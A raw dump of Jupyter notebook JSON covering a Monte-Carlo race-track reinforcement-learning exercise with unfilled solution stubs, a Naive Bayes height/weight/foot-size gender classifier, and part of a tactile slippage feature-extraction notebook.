"# dummy policy\ncourse = build_uturn_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\n\ndummy_slow_stoch_pi = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY, 9])\n\ndummy_slow_stoch_pi[ :, :, :, :, 4] = 1 # set probability of doing nothing to one for every state\n\n# set probability to go right:\ndummy_slow_stoch_pi[:track.bounds[0]//2, :, 0 , 0, 5] = 1 \n# set probability to do nothing where we want to go right:\ndummy_slow_stoch_pi[:track.bounds[0]//2, :, 0 , 0, 4] = 0 \n\ndummy_slow_stoch_pi[:track.bounds[0]//2, -2:, 0 , :, 6] = 1 # probability to go bottom left\ndummy_slow_stoch_pi[:track.bounds[0]//2, -2:, 0 , :, 4] = 0 \n\ndummy_slow_stoch_pi[-2:, track.bounds[1]//2:, : , 0, 0] = 1 # probability to go top left\ndummy_slow_stoch_pi[-2:, track.bounds[1]//2:, : , 0, 4] = 0 \n\npi = dummy_slow_stoch_pi ",
"_____no_output_____"
],
[
"# initialize action_values and counting dict\naction_values = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY, 3, 3])\nn_dict = {}\n\n# configuration parameters\nepsilon = 0.1 # exploration probability\ngamma = 1 # discount factor\nno_episodes = 5000 # number of evaluated episodes\nno_steps = 200 # number of evaluated timesteps per episode\n\n\ntrack = RaceTrackEnv(course)\nx_size, y_size = len(course[0]), len(course)\n\nfor e in tqdm(range(no_episodes), desc='episode', mininterval=2):\n \n # initialize variables in which collected data will be stored\n action_states = [] # list of tuples\n rewards = [] # list of floats\n visited_action_states = set() # set of tuples\n first_visit_list = [] # list of booleans\n \n pos_map = np.zeros((y_size, x_size)) # initializes a map that can be plotted\n \n # YOUR CODE HERE\n raise NotImplementedError()\n \n # this code fragment is to plot the sampled map, comment out for faster computation\n print('Sample trajectory on learned policy in episode {}:'.format(e))\n pos_map = (pos_map > 0).astype(np.float32)\n pos_map += track.course # overlay track course\n plot_pos_map(pos_map)",
"_____no_output_____"
]
],
[
[
"Use the code block directly below to test the resulting deterministic greedy policy (several samples are taken in order to show behavior in all different starting positions).",
"_____no_output_____"
]
],
[
[
"no_episodes = 10\nfor e in range(no_episodes):\n \n pos_map = np.zeros((y_size, x_size))\n p, v = track.reset()\n for k in range(200):\n s_y, s_x = p[0], p[1]\n s_vy, s_vx = v[0], v[1]\n \n pos_map[s_y, s_x] += 1 # exploration map\n \n action = np.argmax(pi[s_y, s_x, s_vy, s_vx])\n a = track.action_to_tuple(action)\n action_state = track.state_action((p, v), a)\n\n (p, v), reward, done, _ = track.step(a)\n\n if done:\n break \n\n print('Sample trajectory on learned policy in episode {}:'.format(e))\n pos_map = (pos_map > 0).astype(np.int16)\n pos_map += track.course # overlay track course\n plot_pos_map(pos_map)",
"_____no_output_____"
]
],
[
[
"## 3) Off-Policy $\\varepsilon$-Greedy Control",
"_____no_output_____"
],
[
"Using the dummy-policy from 2) as a behavior policy, write an off-policy Monte-Carlo algorithm with weighted importance sampling.\n\nHas the result gotten better or worse? Why?",
"_____no_output_____"
],
[
"## 3) Solution",
"_____no_output_____"
],
[
"YOUR ANSWER HERE",
"_____no_output_____"
]
],
[
[
"### Dummy Policy\ncourse = build_uturn_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\ndummy_slow_stoch_pi = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY, 9])\n\n# as the behavior policy is not alternated, there is no possibility to implement the epsilon parameter later\n# hence, we need to implemented it right here\nepsilon = 0.1\n\ndummy_slow_stoch_pi[ :, :, :, :, 4] = 1 - epsilon + epsilon / 9\nfor i in range(9):\n if i != 4:\n dummy_slow_stoch_pi[ :, :, :, :, i] = epsilon / 9\n \ndummy_slow_stoch_pi[:track.bounds[0]//2, :, 0 , 0, 5] = 1-epsilon + epsilon/9\ndummy_slow_stoch_pi[:track.bounds[0]//2, :, 0 , 0, 4] = epsilon / 9\n\ndummy_slow_stoch_pi[:track.bounds[0]//2, -2:, 0 , :, 6] = 1-epsilon + epsilon/9\ndummy_slow_stoch_pi[:track.bounds[0]//2, -2:, 0 , :, 4] = epsilon / 9\n\ndummy_slow_stoch_pi[-2:, track.bounds[1]//2:, : , 0, 0] = 1-epsilon + epsilon/9\ndummy_slow_stoch_pi[-2:, track.bounds[1]//2:, : , 0, 4] = epsilon / 9\n\nbehavior_policy = dummy_slow_stoch_pi \n\npi = np.copy(behavior_policy)",
"_____no_output_____"
],
[
"# initialize action_values and dict of cumulated WIS weights\naction_values = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY, 3, 3])\nc_dict = {}\n\n# configuration parameters\n# epsilon = 0.1 was defined within the behavior policy\ngamma = 1 # discount factor\nno_episodes = 1000 # number of evaluated episodes\nno_steps = 200 # number of evaluated timesteps per episode\n\ncourse = course\ntrack = RaceTrackEnv(course)\nx_size, y_size = len(course[0]), len(course)\n\nfor e in tqdm(range(no_episodes), desc='episode', mininterval=2):\n \n action_states = []\n actions = []\n rewards = []\n \n pos_map = np.zeros((y_size, x_size))\n \n # YOUR CODE HERE\n raise NotImplementedError()\n \n # code fragment for plotting \n pos_map = (pos_map > 0).astype(np.float32)\n pos_map += track.course # overlay track course\n print('Sample trajectory on learned policy in episode {}:'.format(e))\n plot_pos_map(pos_map)",
"_____no_output_____"
],
[
"episodes = 10\nfor e in range(episodes):\n \n pos_map = np.zeros((y_size, x_size))\n p, v = track.reset()\n for k in range(200):\n s_y, s_x = p[0], p[1]\n s_vy, s_vx = v[0], v[1]\n \n pos_map[s_y, s_x] += 1 # exploration map\n \n action = np.argmax(pi[s_y, s_x, s_vy, s_vx])\n \n a = track.action_to_tuple(action)\n action_state = track.state_action((p, v), a)\n\n (p, v), reward, done, _ = track.step(a)\n\n if done:\n print('Done')\n break \n\n \n print('Sample trajectory on learned policy in episode {}:'.format(e))\n pos_map = (pos_map > 0).astype(np.int16)\n pos_map += track.course # overlay track course\n plot_pos_map(pos_map)",
"_____no_output_____"
]
],
[
[
"## 4) Extra Challenge: A More Complex Course",
"_____no_output_____"
],
[
"The course given below poses a substantially harder challenge for Monte-Carlo based algorithms. Why? If you want to try solving it yourself, be aware that it may take much longer until a successful policy is found.",
"_____no_output_____"
]
],
[
[
"# Build the course\n_course_dim = (8, 10)\n_inner_wall_dim = (2, 6)\n\ndef build_rect_course(course_dim, inner_wall_dim):\n \"\"\"\n Build a race track given specifications for the outer cyclic street and inner wall dimensions.\n Start and finish line should be placed in the center top. The course dimension specifications\n do not consider a bounding wall around the track, which must be inserted additionally.\n \n Args:\n course_dim: 2-tuple, (y-dim, x-dim): The size of the track without outer walls.\n inner_wall_dim: 2-tuple (y-dim, x-dim): The size of the inner wall\n \n \"\"\"\n track = []\n wall_up_bound = course_dim[0]//2 - inner_wall_dim[0] // 2\n wall_bottom_bound = course_dim[0]//2 + inner_wall_dim[0]//2\n street_width = course_dim[1]//2 - inner_wall_dim[1]//2\n # construct course line by line\n for i in range(course_dim[0]):\n if i < wall_up_bound:\n half_street_len = course_dim[1]//2 - 1\n track_row = 'o'*half_street_len + '+W-' + 'o'*(half_street_len-1)\n elif wall_up_bound <= i < wall_bottom_bound:\n track_row = 'o'*street_width + 'W'*inner_wall_dim[1] + 'o'*street_width\n else:\n track_row = 'o'*course_dim[1]\n track.append(track_row)\n # add boundary\n track = ['W'*course_dim[1]] + track + ['W'*course_dim[1]]\n track = ['W'+s+'W' for s in track]\n return track\n \ncourse = build_rect_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\nfor row in course:\n print(row)\n \npos_map = track.course # overlay track course\nplot_pos_map(pos_map)",
"_____no_output_____"
]
],
[
[
"## 4) Solution",
"_____no_output_____"
],
[
"YOUR ANSWER HERE",
"_____no_output_____"
],
[
"YOUR ANSWER HERE",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e707a7c3a7b0b16b03996b2e105568841b653614 | 27,286 | ipynb | Jupyter Notebook | Naive Bayes.ipynb | aihubprojects/Machine-Learning-From-Scratch | 8deba5ea0ad438eb06b3ddcb1cd70e5a59672dc3 | [
"MIT"
] | 4 | 2020-09-17T05:25:34.000Z | 2021-01-05T10:35:45.000Z | Naive Bayes.ipynb | aihubprojects/Machine-Learning-From-Scratch | 8deba5ea0ad438eb06b3ddcb1cd70e5a59672dc3 | [
"MIT"
] | null | null | null | Naive Bayes.ipynb | aihubprojects/Machine-Learning-From-Scratch | 8deba5ea0ad438eb06b3ddcb1cd70e5a59672dc3 | [
"MIT"
] | 3 | 2020-11-13T03:23:35.000Z | 2021-06-05T14:03:52.000Z | 36.044914 | 6,800 | 0.550502 | [
[
[
"import pandas as pd\nimport numpy as np\n\n# Create an empty dataframe\ndata = pd.DataFrame()\n\n# Create our target variable\ndata['Gender'] = ['male','male','male','male','female','female','female','female']\n\n# Create our feature variables\ndata['Height'] = [6,5.92,5.58,5.92,5,5.5,5.42,5.75]\ndata['Weight'] = [180,190,170,165,100,150,130,150]\ndata['Foot_Size'] = [12,11,12,10,6,8,7,9]\n\n# View the data\ndata",
"_____no_output_____"
],
[
"# Create an empty dataframe\nperson = pd.DataFrame()\n\n# Create some feature values for this single row\nperson['Height'] = [6]\nperson['Weight'] = [130]\nperson['Foot_Size'] = [8]\n\n# View the data \nperson",
"_____no_output_____"
]
],
[
[
"# Calculate Priors",
"_____no_output_____"
]
],
[
[
"# Number of males\nn_male = data['Gender'][data['Gender'] == 'male'].count()\n\n# Number of males\nn_female = data['Gender'][data['Gender'] == 'female'].count()\n\n# Total rows\ntotal_ppl = data['Gender'].count()",
"_____no_output_____"
],
[
"# Number of males divided by the total rows\nP_male = n_male/total_ppl\n\n# Number of females divided by the total rows\nP_female = n_female/total_ppl",
"_____no_output_____"
]
],
[
[
"# Calculate Likelihood",
"_____no_output_____"
]
],
[
[
"# Group the data by gender and calculate the means of each feature\ndata_means = data.groupby('Gender').mean()\n\n# View the values\ndata_means",
"_____no_output_____"
],
[
"# Group the data by gender and calculate the variance of each feature\ndata_variance = data.groupby('Gender').var()\n\n# View the values\ndata_variance",
"_____no_output_____"
],
[
"# Means for male\nmale_height_mean = data_means['Height'][data_variance.index == 'male'].values[0]\nmale_weight_mean = data_means['Weight'][data_variance.index == 'male'].values[0]\nmale_footsize_mean = data_means['Foot_Size'][data_variance.index == 'male'].values[0]\n\n# Variance for male\nmale_height_variance = data_variance['Height'][data_variance.index == 'male'].values[0]\nmale_weight_variance = data_variance['Weight'][data_variance.index == 'male'].values[0]\nmale_footsize_variance = data_variance['Foot_Size'][data_variance.index == 'male'].values[0]\n\n# Means for female\nfemale_height_mean = data_means['Height'][data_variance.index == 'female'].values[0]\nfemale_weight_mean = data_means['Weight'][data_variance.index == 'female'].values[0]\nfemale_footsize_mean = data_means['Foot_Size'][data_variance.index == 'female'].values[0]\n\n# Variance for female\nfemale_height_variance = data_variance['Height'][data_variance.index == 'female'].values[0]\nfemale_weight_variance = data_variance['Weight'][data_variance.index == 'female'].values[0]\nfemale_footsize_variance = data_variance['Foot_Size'][data_variance.index == 'female'].values[0]",
"_____no_output_____"
],
[
"# Create a function that calculates p(x | y):\ndef p_x_given_y(x, mean_y, variance_y):\n\n # Input the arguments into a probability density function\n p = 1/(np.sqrt(2*np.pi*variance_y)) * np.exp((-(x-mean_y)**2)/(2*variance_y))\n \n # return p\n return p",
"_____no_output_____"
],
[
"# Numerator of the posterior if the unclassified observation is a male\nP_male * \\\np_x_given_y(person['Height'][0], male_height_mean, male_height_variance) * \\\np_x_given_y(person['Weight'][0], male_weight_mean, male_weight_variance) * \\\np_x_given_y(person['Foot_Size'][0], male_footsize_mean, male_footsize_variance)",
"_____no_output_____"
],
[
"# Numerator of the posterior if the unclassified observation is a female\nP_female * \\\np_x_given_y(person['Height'][0], female_height_mean, female_height_variance) * \\\np_x_given_y(person['Weight'][0], female_weight_mean, female_weight_variance) * \\\np_x_given_y(person['Foot_Size'][0], female_footsize_mean, female_footsize_variance)",
"_____no_output_____"
]
],
[
[
"# FROM SCRATCH",
"_____no_output_____"
]
],
[
[
"data = pd.DataFrame()\n\n# Create our target variable\ndata['Gender'] = [1,1,1,1,0,0,0,0]\n\n# Create our feature variables\ndata['Height'] = [6,5.92,5.58,5.92,5,5.5,5.42,5.75]\ndata['Weight'] = [180,190,170,165,100,150,130,150]\ndata['Foot_Size'] = [12,11,12,10,6,8,7,9]\n\ndata",
"_____no_output_____"
],
[
"X = data.drop(['Gender'],axis=1) \ny=data.Gender\n\n \n# splitting X and y into training and testing sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=1)\n \n# training the model on training set\nfrom sklearn.naive_bayes import GaussianNB\ngnb = GaussianNB()\ngnb.fit(X_train, y_train)\n \n# making predictions on the testing set\ny_pred = gnb.predict(X_test)\n",
"_____no_output_____"
],
[
"\nfrom sklearn.metrics import classification_report, confusion_matrix\nprint(classification_report(y, gnb.predict(X)))",
" precision recall f1-score support\n\n 0 0.80 1.00 0.89 4\n 1 1.00 0.75 0.86 4\n\n accuracy 0.88 8\n macro avg 0.90 0.88 0.87 8\nweighted avg 0.90 0.88 0.87 8\n\n"
],
[
"cm = confusion_matrix(y, gnb.predict(X))\n\nfig, ax = plt.subplots(figsize=(8, 8))\nax.imshow(cm)\nax.grid(False)\nax.xaxis.set(ticks=(0, 1), ticklabels=('Predicted 0s', 'Predicted 1s'))\nax.yaxis.set(ticks=(0, 1), ticklabels=('Actual 0s', 'Actual 1s'))\nax.set_ylim(1.5, -0.5)\nfor i in range(2):\n for j in range(2):\n ax.text(j, i, cm[i, j], ha='center', va='center', color='red')\nplt.show()",
"_____no_output_____"
],
[
"# Create our target variable\ndata1 = pd.DataFrame()\n# Create our feature variables\ndata1['Height'] = [6]\ndata1['Weight'] = [130]\ndata1['Foot_Size'] = [8]\ny_pred = gnb.predict(data1)\nif y_pred==0:\n print (\"female\")\nelse:\n print (\"male\")",
"female\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
e707b1117078d8cf40bdf974cf4da7708800648b | 164,734 | ipynb | Jupyter Notebook | MLslippagesrc/MLslippage/FeatExplained.ipynb | jagrio/MachineLearningSlippage | 357259e4635f01605b12797a3caaee594375674d | [
"BSD-3-Clause"
] | 1 | 2021-02-10T15:52:19.000Z | 2021-02-10T15:52:19.000Z | MLslippagesrc/MLslippage/FeatExplained.ipynb | jagrio/MachineLearningSlippage | 357259e4635f01605b12797a3caaee594375674d | [
"BSD-3-Clause"
] | null | null | null | MLslippagesrc/MLslippage/FeatExplained.ipynb | jagrio/MachineLearningSlippage | 357259e4635f01605b12797a3caaee594375674d | [
"BSD-3-Clause"
] | null | null | null | 69.361684 | 21,058 | 0.688971 | [
[
[
"\"\"\"Mainly Edited for private usage by: Ioanna Mitsioni\n Ioannis Agriomallos\nLicense: BSD 3 clause\n\"\"\"\nimport time\nstart_time = time.time()\nfrom copy import deepcopy, copy\nimport math\nimport scipy.io as sio\nimport shutil\nimport os\nfrom random import shuffle\nimport numpy as np\nfrom pylab import *\n# from featext2 import *\nimport matplotlib.pyplot as plt\n%matplotlib inline \n#matplotlib qt\n# inline (suitable for ipython only, shown inside browser!) or qt (suitable in general, shown in external window!)\nfrom matplotlib.colors import ListedColormap\nfrom mpl_toolkits.mplot3d import Axes3D #, axes3d\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, normalize\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.feature_selection import SelectFromModel, SelectKBest, mutual_info_classif\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom collections import OrderedDict\nimport re\nimport datetime\nimport urllib\nimport tarfile\n# import joblib\n# from joblib import Parallel, delayed, Memory\nfrom tempfile import mkdtemp\nimport copy_reg\nimport types\nimport itertools\nfrom itertools import compress\nfrom collections import Counter\nimport glob\n\n#import multiprocessing\ndef _pickle_method(m):\n if m.im_self is None:\n return getattr, (m.im_class, m.im_func.func_name)\n else:\n return getattr, (m.im_self, m.im_func.func_name)\ncopy_reg.pickle(types.MethodType, _pickle_method)\n\n\nh = .2 # step size in the mesh\nwindow = 1024",
"_____no_output_____"
],
[
"############ Feature Names ############\n\"\"\"features: || if \n |--> time domain : || samples = 1024\n |----|---> phinyomark : 11+3{shist} --------------------------> = 14+0.0samples || 14\n |----|---> golz : 10+samples{acrol} --------------------> = 10+1.0samples || 1034\n |--> frequency domain : \n |----|---> phinyomark : 3{arco}+4{mf}+2(samples/2+1){RF,IF} --> = 9+1.0samples || 1033\n |----|---> golz : 2(samples/2+1){AF,PF} ----------------> = 2+1.0samples || 1026\n |----|----------------|-------alltogether---------------------> = 35+3.0samples || numfeat = 3107\n\"\"\"\n## Time Domain Phinyomark feats\nfeatnames = ['intsgnl', 'meanabs', 'meanabsslp', 'ssi', 'var', 'rms', 'rng', 'wavl', 'zerox', 'ssc', 'wamp', \n 'shist1', 'shist2', 'shist3'] # 11+3{shist}\n## Frequency Domain Phinyomark feats\nfeatnames += ['arco1', 'arco2', 'arco3', 'mnf', 'mdf', 'mmnf', 'mmdf'] # 3{arco}+4{mf}\nfeatnames += ['reFFT{:03d}'.format(i) for i in range(window/2+1)] # samples/2+1{RF}\nfeatnames += ['imFFT{:03d}'.format(i) for i in range(window/2+1)] # samples/2+1{IF}\n## Time Domain Golz feats\nfeatnames += ['meanv', 'stdr', 'mx', 'rngx', 'rngy', 'med', 'hjorth', 'sentr', 'se', 'ssk'] # 10\nfeatnames += ['acrol{:04d}'.format(i) for i in range(window)] # samples{acrol}\n## Frequency Domain Golz feats\nfeatnames += ['amFFT{:03d}'.format(i) for i in range(window/2+1)] # samples/2+1{AF}\nfeatnames += ['phFFT{:03d}'.format(i) for i in range(window/2+1)] # samples/2+1{PF}",
"_____no_output_____"
],
[
"############ Prepare the indeces for each feature ############\ndef get_feat_id(feat_ind, printit=0, sample_window=window): \n \"\"\"Find the corresponding indeces of the desired features inside feature vector,\n and link them with their names and level of abstraction\n -> feat_ind : range of indeces\n -> printit : print output indeces (1) or not (0)\n -> sample_window : parameter for accurate computation of feature indeces\n <- full_path_id : indeces of all features\n <- norm_time_feats : indeces of time features\n <- norm_freq_feats : indeces of frequency features\n \"\"\"\n # get the feat inds wrt their source : 3rd level\n norm_time_phin = range(0,14)\n norm_freq_phin = range(norm_time_phin[-1] + 1, norm_time_phin[-1] + 9 + sample_window + 1)\n norm_time_golz = range(norm_freq_phin[-1] + 1, norm_freq_phin[-1] + 10 + sample_window + 1)\n norm_freq_golz = range(norm_time_golz[-1] + 1, norm_time_golz[-1] + 2 + sample_window + 1)\n # get the feat inds wrt their domain : 2nd level \n norm_time_feats = norm_time_phin + norm_time_golz\n norm_freq_feats = norm_freq_phin + norm_freq_golz\n # get the feat inds wrt their prefeat: 1st level \n norm_feats = norm_time_feats + norm_freq_feats\n\n # get the feat inds wrt their source : 3rd level\n disp = norm_feats[-1]+1\n ftfn_time_phin = range(disp ,disp + 14)\n ftfn_freq_phin = range(ftfn_time_phin[-1] + 1, ftfn_time_phin[-1] + 9 + sample_window + 1)\n ftfn_time_golz = range(ftfn_freq_phin[-1] + 1, ftfn_freq_phin[-1] + 10 + sample_window + 1)\n ftfn_freq_golz = range(ftfn_time_golz[-1] + 1, ftfn_time_golz[-1] + 2 + sample_window + 1)\n # get the feat inds wrt their domain : 2nd level \n ftfn_time_feats = ftfn_time_phin + ftfn_time_golz\n ftfn_freq_feats = ftfn_freq_phin + ftfn_freq_golz\n # get the feat inds wrt their prefeat: 1st level \n ftfn_feats = ftfn_time_feats + ftfn_freq_feats\n\n # create the final \"reference dictionary\"\n # 3 np.arrays, id_list[0] = level 1 etc\n id_list = [np.zeros((len(ftfn_feats + norm_feats),1)) for i in range(3)]\n id_list[0][:norm_feats[-1]+1] = 0 # 0 signifies norm / 1 signifies ft/fn\n id_list[0][norm_feats[-1]+1:] = 1\n\n id_list[1][:norm_time_phin[-1]+1] = 0 # 0 signifies time / 1 signifies freq\n id_list[1][norm_time_phin[-1]+1:norm_freq_phin[-1]+1] = 1\n id_list[1][norm_freq_phin[-1]+1:norm_time_golz[-1]+1] = 0\n id_list[1][norm_time_golz[-1]+1:norm_freq_golz[-1]+1] = 1\n id_list[1][norm_freq_golz[-1]+1:ftfn_time_phin[-1]+1] = 0\n id_list[1][ftfn_time_phin[-1]+1:ftfn_freq_phin[-1]+1] = 1\n id_list[1][ftfn_freq_phin[-1]+1:ftfn_time_golz[-1]+1] = 0\n id_list[1][ftfn_time_golz[-1]+1:] = 1\n\n id_list[2][:norm_freq_phin[-1]+1] = 0 #0 signifies phinyomark / 1 signifies golz\n id_list[2][norm_freq_phin[-1]+1:norm_freq_golz[-1]+1] = 1\n id_list[2][norm_freq_golz[-1]+1:ftfn_freq_phin[-1]+1] = 0\n id_list[2][ftfn_freq_phin[-1]+1:] = 1 \n \n full_path_id = [np.zeros((len(feat_ind),5)) for i in range(len(feat_ind))]\n \n for ind, val in enumerate(feat_ind):\n full_path_id[ind] = [val, id_list[2][val], id_list[1][val], id_list[0][val]]\n if (printit==1):\n if(full_path_id[ind][1]==0):\n lvl3 = 'Phin'\n else:\n lvl3 = 'Golz'\n if(full_path_id[ind][2]==0):\n lvl2 = 'Time'\n else:\n lvl2 = 'Freq'\n if(full_path_id[ind][3]==0):\n lvl1 = 'Norm'\n else:\n lvl1 = 'Ft/Fn'\n print(feat_ind[ind],featnames[val%(norm_feats[-1]+1)],lvl3,lvl2,lvl1)\n \n return(full_path_id,norm_time_feats,norm_freq_feats) ",
"_____no_output_____"
],
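[
"# Added usage sketch (illustrative): resolve a few feature indices to their\n# (index, name, source, domain, prefeat) description; indices >= 3107 refer to\n# the ft/fn copies of the same per-sample features.\n_ = get_feat_id([0, 14, 1047, 3107], printit=1)",
"_____no_output_____"
],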
[
"def subfeat_inds(ofs=len(featnames)):\n \"\"\"returns a subfeatures' indeces\n -> ofs : number of features in total\n <- amfft, freq, time, both : split featureset indeces for \n amplitude of FFT, all time only,\n all frequency only and all features\n \"\"\"\n _,time,freq = get_feat_id(range(ofs))\n both = range(ofs)\n amfft = []\n for i in range(len(featnames)):\n if (featnames[i].startswith('amFFT')):\n amfft.append(i)\n return amfft, freq, time, both",
"_____no_output_____"
],
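[
"# Added usage sketch (illustrative): sizes of the sub-featuresets over the\n# 3107-dimensional feature vector.\namfft, freq, tim, both = subfeat_inds()\nprint('amFFT: %d, freq: %d, time: %d, all: %d' % (len(amfft), len(freq), len(tim), len(both)))",
"_____no_output_____"
],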
[
"def get_tot_feats(fs, subfs, r):\n ###############################################################################################################\n # Version 2, using the bool masks and keeping an array of 6x3000 feats \n ###############################################################################################################\n # If checking for FnormAll, you end up with 36 models of (trained_on, tested_on) combinations but TECHNICALLY\n # the features are the same for every trained_on \"sixplet\" so there's no need to iterate over all the tested_on\n # indeces. Therefore, ts = 2 is chosen arbitrarily \n \n# filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_*.npz\")\n filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_tr_\" + str(0) + \"_ts_\" + str(5) + \".npz\")\n print filenames\n # the features kept for surface i will be stored in bool_tot_feats[i] (final size: 6x1000)\n bool_tot_feats = []\n best_tot_feats = []\n best_tot_scores = []\n \n for filn in filenames:\n # for every training surface \n model_file = np.load(filn)\n model = model_file['model']\n #keep a list of the 1000 features kept\n model_feat_scores = model[0].named_steps['feature_selection'].scores_\n bool_model_features = list(model[0].named_steps['feature_selection'].get_support(indices = False))\n if subfs<=2:\n bool_model_features = np.logical_not(np.array(bool_model_features))\n bool_model_features[np.array(model_feat_scores).argsort()[-1000:][::-1].tolist()] = True\n bool_model_features = bool_model_features.tolist()\n# plt.plot(model_feat_scores)\n bool_tot_feats.append(bool_model_features)\n best_tot_scores.append(np.array(model_feat_scores[np.array(model_feat_scores).argsort()[-1000:][::-1].tolist()]))\n best_tot_feats.append(np.array(model_feat_scores).argsort()[-1000:][::-1])\n \n return bool_tot_feats, best_tot_feats, best_tot_scores",
"_____no_output_____"
],
[
"def get_tot_feats_importance_pca(fs, subfs, r):\n ###############################################################################################################\n # Version 2, using the bool masks and keeping an array of 6x3000 feats \n ###############################################################################################################\n # If checking for FnormAll, you end up with 36 models of (trained_on, tested_on) combinations but TECHNICALLY\n # the features are the same for every trained_on \"sixplet\" so there's no need to iterate over all the tested_on\n # indeces. Therefore, ts = 2 is chosen arbitrarily \n \n# filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_*.npz\")\n filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_tr_\" + str(0) + \"_ts_\" + str(5) + \".npz\")\n print filenames\n # the features kept for surface i will be stored in bool_tot_feats[i] (final size: 6x1000)\n bool_tot_feats = []\n best_tot_feats = []\n best_tot_scores = []\n \n for filn in filenames:\n # for every training surface \n model_file = np.load(filn)\n model = model_file['model'][0]\n #keep a list of the 1000 features kept\n \n model_pca_var = model[0].named_steps['decomp'].explained_variance_\n model_pca_var_rat = model[0].named_steps['decomp'].explained_variance_ratio_\n model_pca_covar = model[0].named_steps['decomp'].get_covariance()\n model_pca_mean = model[0].named_steps['decomp'].mean_\n n_comp = model[0].named_steps['decomp'].n_components_\n comp = model[0].named_steps['decomp'].components_\n print len(model_pca_var), model_pca_var\n print len(model_pca_var_rat), model_pca_var_rat\n print model_pca_covar.shape, model_pca_covar\n # plt.imshow(model_pca_covar)\n print len(model_pca_mean), model_pca_mean\n print n_comp\n print comp.shape, comp\n nfeat = 1000\n feat_importance = np.zeros(nfeat)\n for nc in range(len(comp)):\n feat_importance += comp[nc]*model_pca_var_rat[nc]\n # plt.plot(range(1000),comp[nc]*model_pca_var_rat[nc])\n plt.plot(range(nfeat),feat_importance/nfeat)\n print feat_importance*nfeat\n sort_feat_imp_ind = np.array(feat_importance).argsort()[:][::-1]\n print np.array(featnames)[sort_feat_imp_ind]\n \n \n model_feat_scores = model[0].named_steps['feature_selection'].scores_\n bool_model_features = list(model[0].named_steps['feature_selection'].get_support(indices = False))\n if subfs<=2:\n bool_model_features = np.logical_not(np.array(bool_model_features))\n bool_model_features[np.array(model_feat_scores).argsort()[-1000:][::-1].tolist()] = True\n bool_model_features = bool_model_features.tolist()\n# plt.plot(model_feat_scores)\n bool_tot_feats.append(bool_model_features)\n best_tot_scores.append(np.array(model_feat_scores[np.array(model_feat_scores).argsort()[-1000:][::-1].tolist()]))\n best_tot_feats.append(np.array(model_feat_scores).argsort()[-1000:][::-1])\n \n return bool_tot_feats, best_tot_feats, best_tot_scores",
"_____no_output_____"
],
[
"def freq_time_counter(full_names, subfs):\n f_c = 0; t_c = 0\n for i in range(len(full_names)):\n if full_names[i][2] == 1:\n if subfs!=2:\n f_c += 1\n else:\n if subfs>=2:\n t_c += 1\n return (f_c, t_c)",
"_____no_output_____"
],
[
"def get_common_feats(bool_tot_feats, subfs, skip_surf = 6, print_common_feats = 0): \n # skip_surf = 6 by default so you won't skip any surfaces.\n # returns the list of inds for the common feats\n trans_test_bools = []\n\n for i in range(len(bool_tot_feats)):\n if i != skip_surf:\n trans_test_bools.append(bool_tot_feats[i])\n else: \n continue\n \n trans_test_bools = np.transpose(trans_test_bools)\n common_feats = []\n matches = []\n for i in range(len(trans_test_bools)):\n matches.append(np.all(trans_test_bools[i]))\n for ind, val in enumerate(matches):\n if val:\n common_feats.append(ind)\n print(\"===============================================================\") \n print(\"%d common feats, out of %d total\" %(len(common_feats),len(matches)))\n full_names, _, _ = get_feat_id(common_feats, printit = print_common_feats)\n freq_counter, time_counter = freq_time_counter(full_names, subfs)\n print(\"of which, %d (%.2f%%) were Freq features and %d (%.2f%%) were Time features\" %(freq_counter, (float(freq_counter)/len(common_feats))*100, time_counter, (float(time_counter)/len(common_feats))*100 ))\n\n print(\"===============================================================\")\n \n return common_feats, full_names",
"_____no_output_____"
],
[
